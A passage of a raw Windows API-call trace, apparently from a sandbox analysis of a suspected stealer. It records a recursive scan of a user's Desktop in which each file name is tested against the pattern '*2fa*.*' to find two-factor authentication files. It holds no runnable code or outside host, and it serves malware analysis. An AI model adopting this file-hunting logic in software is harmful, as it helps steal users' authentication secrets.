[0110.852] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 0 [0110.852] FindClose (in: hFindFile=0x743720 | out: hFindFile=0x743720) returned 1 [0110.852] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.852] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea458 [0110.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x38ea458, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpUsedDefaultChar=0x0) returned 50 [0110.852] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.852] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea458 | out: hHeap=0x29a0000) returned 1 [0110.852] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.852] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab28 [0110.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x29aab28, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.852] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab28 | out: hHeap=0x29a0000) returned 1 [0110.852] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*2fa*.*") returned 0 [0110.852] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.852] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 0 [0110.852] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0110.852] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eacb8 [0110.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.852] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x24) returned 0x29a31f8 [0110.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x29a31f8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpUsedDefaultChar=0x0) returned 36 [0110.853] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.853] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a31f8 | out: hHeap=0x29a0000) returned 1 [0110.853] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eacb8 | out: hHeap=0x29a0000) returned 1 [0110.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.853] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaaf8 [0110.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaaf8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.853] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.853] PathMatchSpecW (pszFile="KTOu", pszSpec="*2fa*.*") returned 0 [0110.853] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.853] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59203b50, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0x89c45de0, ftLastAccessTime.dwHighDateTime=0x1d7aeaa, ftLastWriteTime.dwLowDateTime=0x89c45de0, ftLastWriteTime.dwHighDateTime=0x1d7aeaa, nFileSizeHigh=0x0, nFileSizeLow=0xac61, dwReserved0=0x0, dwReserved1=0x0, cFileName="LyMn8DqKE.jpg", cAlternateFileName="LYMN8D~1.JPG")) returned 1 [0110.853] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.853] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.853] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg" [0110.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.853] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.853] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.853] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.853] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.853] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac18 [0110.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac18, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.853] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.853] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*2fa*.*") returned 0 [0110.854] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.854] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39c99910, ftCreationTime.dwHighDateTime=0x1d7af1b, ftLastAccessTime.dwLowDateTime=0x44bbdf10, ftLastAccessTime.dwHighDateTime=0x1d7af4b, ftLastWriteTime.dwLowDateTime=0x44bbdf10, ftLastWriteTime.dwHighDateTime=0x1d7af4b, nFileSizeHigh=0x0, nFileSizeLow=0x6aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="MB3JQQUgbwGVRNgeCA.gif", cAlternateFileName="MB3JQQ~1.GIF")) returned 1 [0110.854] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.854] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.854] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif" [0110.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.854] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x38ea458 [0110.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x38ea458, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", lpUsedDefaultChar=0x0) returned 54 [0110.854] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0110.854] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea458 | out: hHeap=0x29a0000) returned 1 [0110.854] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.854] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaae0 [0110.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaae0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.854] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0110.854] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*2fa*.*") returned 0 [0110.854] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d20 | out: hHeap=0x29a0000) returned 1 [0110.854] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c41370, ftCreationTime.dwHighDateTime=0x1d7ae73, ftLastAccessTime.dwLowDateTime=0x50a541d0, ftLastAccessTime.dwHighDateTime=0x1d7af24, ftLastWriteTime.dwLowDateTime=0x50a541d0, ftLastWriteTime.dwHighDateTime=0x1d7af24, nFileSizeHigh=0x0, nFileSizeLow=0x17a6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="O93_HCF.xlsx", cAlternateFileName="O93_HC~1.XLS")) returned 1 [0110.854] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.854] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.854] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="O93_HCF.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx" [0110.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.854] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", lpUsedDefaultChar=0x0) returned 44 [0110.854] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.854] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.854] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.855] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac18 [0110.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac18, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.855] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.855] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*2fa*.*") returned 0 [0110.855] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.855] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212b71d0, ftCreationTime.dwHighDateTime=0x1d7a377, ftLastAccessTime.dwLowDateTime=0xbbf74c40, ftLastAccessTime.dwHighDateTime=0x1d7ac26, ftLastWriteTime.dwLowDateTime=0xbbf74c40, ftLastWriteTime.dwHighDateTime=0x1d7ac26, nFileSizeHigh=0x0, nFileSizeLow=0x4735, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oar504.gif", cAlternateFileName="")) returned 1 [0110.855] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.855] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.855] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Oar504.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif" [0110.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.855] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", lpUsedDefaultChar=0x0) returned 42 [0110.855] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.855] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.855] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.855] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aabb8 [0110.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aabb8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.855] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabb8 | out: hHeap=0x29a0000) returned 1 [0110.855] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*2fa*.*") returned 0 [0110.855] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.855] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p B1LdDcHaeS", cAlternateFileName="PB1LDD~1")) returned 1 [0110.855] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.855] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.855] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.855] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7435a0 [0110.859] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.859] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.859] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\." [0110.859] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.859] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.859] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.859] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.." [0110.859] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5cc6e0, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x5ed18130, ftLastAccessTime.dwHighDateTime=0x1d7a4a0, ftLastWriteTime.dwLowDateTime=0x5ed18130, ftLastWriteTime.dwHighDateTime=0x1d7a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x34c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eLLiqLz9t.avi", cAlternateFileName="6ELLIQ~1.AVI")) returned 1 [0110.859] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.859] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.859] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.860] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2f18 [0110.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x29a2f18, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", lpUsedDefaultChar=0x0) returned 59 [0110.860] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0110.860] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2f18 | out: hHeap=0x29a0000) returned 1 [0110.860] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.860] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aabb8 [0110.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 